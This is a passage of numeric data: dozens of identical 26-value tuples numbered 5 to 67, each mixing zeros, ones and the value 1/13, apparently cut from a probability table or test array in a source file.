(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 5
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 6
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 7
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 8
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 9
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 10
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 11
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 12
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 13
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 14
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 15
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 16
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 17
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 18
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 19
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 20
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 21
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 22
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 23
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 24
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 25
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 26
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 27
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 28
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 29
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 30
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 31
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 32
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 33
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 34
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 35
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 36
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 37
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 38
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 39
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 40
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 41
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 42
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 43
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 44
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 45
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 46
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 47
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 48
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 49
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 50
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 51
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 52
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 53
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 54
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 55
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 56
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 57
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 58
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 59
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 60
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 61
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 62
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 63
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 64
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 65
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 66
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 67
